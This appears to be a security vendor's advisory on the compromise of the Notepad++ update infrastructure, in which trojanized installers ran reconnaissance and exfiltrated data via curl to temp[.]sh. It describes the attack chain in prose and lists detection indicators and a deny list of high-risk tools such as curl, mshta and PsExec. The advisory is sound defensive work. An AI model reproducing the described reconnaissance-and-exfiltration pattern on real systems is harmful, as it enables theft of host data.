Table of contents
What happened in the Notepad++ compromise
On February 2nd, 2026, free source-code developer Notepad++ was compromised.
Developer Don Ho published a security disclosure stating the compromise affected the update infrastructure behind Notepad++.
The disclosure states that multiple research groups likely implicate a Chinese state-sponsored group. The respective Advanced Persistent Threats (APT) groups maintained access from June 2025 until December 2nd, 2025.
Ho’s disclosure goes on to detail the sophistication of the supply chain attack targeting their update mechanisms. In this campaign, state-sponsored attackers successfully hijacked part of the legitimate distribution process.
Rather than exploiting end users directly, the adversary abused the trusted relationship between Notepad++ and its update infrastructure, enabling the delivery of trojanized installers to selectively targeted users.
The impact of this compromise is significant due to the widespread adoption of Notepad++ among developers, system administrators, and security professionals.
By weaponizing a trusted software update path, the attackers gained initial access, reconnaissance, and persistence within victim environments—remaining undetected for months. This compromise illustrates once again how software supply chains remain a high-value target for nation-state actors.
Notepad++ has a history of maintaining a political stance as geopolitical events unfold across the globe. Prior releases have been published with clear political messages including standing with Hong Kong as early as v7.8.9, supporting Taiwan's independence in v8.6.9, and more recently standing with Ukraine in v8.8.1.
A special note can be placed on the irony surrounding the alleged Chinese APTs compromising Notepad++'s supply chain after multiple political messages supporting Taiwan, Hong Kong, and Ukraine.
Technical analysis of the comprised update mechanism
The attack specifically utilizes the WinGUP (GUP.exe) updater component of the Notepad++ update mechanism. Attackers distributed trojanized Notepad++ installers to targeted users, ensuring that the initial execution appeared legitimate and aligned with normal user behavior.
During the compromised update flow, the GUP.exe process was observed spawning an executable named AutoUpdater.exe. That behavior is anomalous under normal conditions.
Ordinarily, WinGUP performs update checks and downloads using the libcurl library internally and does not launch external binaries or invoke curl.exe directly.
Once executed, AutoUpdater.exe conducts a series of host-based reconnaissance actions. These actions included enumerating active network connections, collecting endpoint and operating system details, listing running processes, and identifying any actively logged-in user(s). The information was aggregated and written to a local file named "a.txt".
Following data collection, the malware leveraged curl.exe to exfiltrate the contents of "a.txt" to a remote endpoint hosted on file-sharing service temp[.]sh. The presence of a rogue curl.exe binary is a particularly strong indicator of malicious activity in this context, as it deviates from the expected behavior of the WinGUP updater and introduces a living-off-the-land style exfiltration technique.
Public reporting indicates that this campaign persisted for approximately six months, with attackers maintaining control over the compromised update channel and selectively targeting victims. The long dwell time suggests careful operational security and a high degree of confidence in the stealth of the attack.
Detection opportunities for malicious update activity
- WinGUP invoking external curl binaries
- Curl commands reaching out to temp[.]sh
- Creation of an a.txt file or one letter .txt files, as this is how data is exfiltrated
- Instances of AutoUpdater.exe spawning from temporary directories
Mitigations strategies for supply chain attacks
- Implement a robust Allowlisting solution
- Analyze unusual network activity from applications in temporary directories
- Update trojanized versions of Notepad++ (versions 8.8.2 - 8.8.9) to 8.9.1
- Download updates manually from official sources as opposed to using built-in updaters
How organizations can defend against supply chain attacks
Supply chain compromises are especially dangerous because they abuse trusted software and legitimate update mechanisms. To defend against these attacks, security teams need visibility into application behavior, strict execution controls, and continuous monitoring for deviations from normal update workflows.
In this instance, a custom binary (Autoupdater.exe) spawned from a trusted updater. Implement application control strategies that prevent unauthorized binaries from executing, even when launched by a trusted parent process.
Update mechanisms should also not be permitted to invoke extra tools, spawn additional executables, or communicate with unapproved domains without explicit approval. Limiting these interactions reduces the blast radius of a compromised updater.
Lastly, supply chain attacks often maintain long dwell times and operate quietly to avoid detection. Monitor for unusual process execution chains, unexpected outbound connections, and suspicious fill creation patterns to identify compromised update paths before the impact spreads.
How ThreatLocker can help
Application Allowlisting and Ringfencing™
Although this attack does not require user interaction, allowlisting solutions can still stop unapproved tools and applications from running. In this instance, the custom binary "AutoUpdater.exe" would be automatically blocked as it is not native to the Notepad++ application definition.
ThreatLocker Application Allowlisting blocks applications that are not explicitly permitted, which could include unauthorized updaters and malicious binaries. Additional explicit deny policies can be created to prevent the usage of high-risk applications, such as Curl, WinGUP, Python, MSBuild, vssadmin, mshta, wscript, and PsExec.
Ringfencing™, the proprietary solution from ThreatLocker, prevents known and approved applications from interacting with each other in malicious ways (WinGUP invoking curl.exe) and from reaching out to malicious domains (temp[.]sh).
For applications that are high-risk but required for business processes, Ringfencing policies can be implemented to restrict what resources applications can interact with, such as specific files, internet access, the registry, or executing other applications.
ThreatLocker Detect & Cyber Hero® MDR
ThreatLocker Detect identifies behavior such as ransomware deployment, security service tampering, backup deletion, or data exfiltration and alerts your organization's internal security team or the Cyber Hero® Managed Detection and Response team to verify the actions and mitigate the incident.
ThreatLocker Detect includes detection rules to identify and prevent these attacks, which are globally available:
- TL.NC.1561 - Notepad++ Updater Contacting Foreign Domains
- TL.AAL.1562 - Notepad++ Updater Executing Foreign File
FAQs
What happened in the Notepad++ supply chain compromise?
Notepad++’s update infrastructure was compromised, allowing attackers to distribute trojanized installers to a subset of targeted users. Rather than exploiting a vulnerability on end-user systems, the attackers abused the trusted software update mechanism to gain initial access, perform reconnaissance, and maintain persistence.
Which versions of Notepad++ were affected?
Trojanized updates were observed in Notepad++ versions 8.8.2 through 8.8.9. Users should update to Notepad++ 8.9.1 or later using official download sources.
How did the attackers abuse the Notepad++ update process?
The attackers targeted the WinGUP (GUP.exe) updater component. During the compromised update flow, WinGUP spawned a malicious executable named AutoUpdater.exe. This executable performed host reconnaissance and exfiltrated collected data to a remote endpoint.
Did this attack require user interaction?
No. Once a trojanized update was delivered, the malicious activity occurred automatically as part of the update process.
Who is most at risk from this compromise?
Organizations and individuals who rely heavily on Notepad++, including developers, system administrators, and security professionals, are at higher risk due to the tool’s widespread use and elevated trust within technical environments.
How can organizations reduce the risk of similar attacks?
Organizations should implement strict application execution controls, monitor for abnormal application behavior, restrict how applications interact with external tools and services, and maintain visibility into update mechanisms.
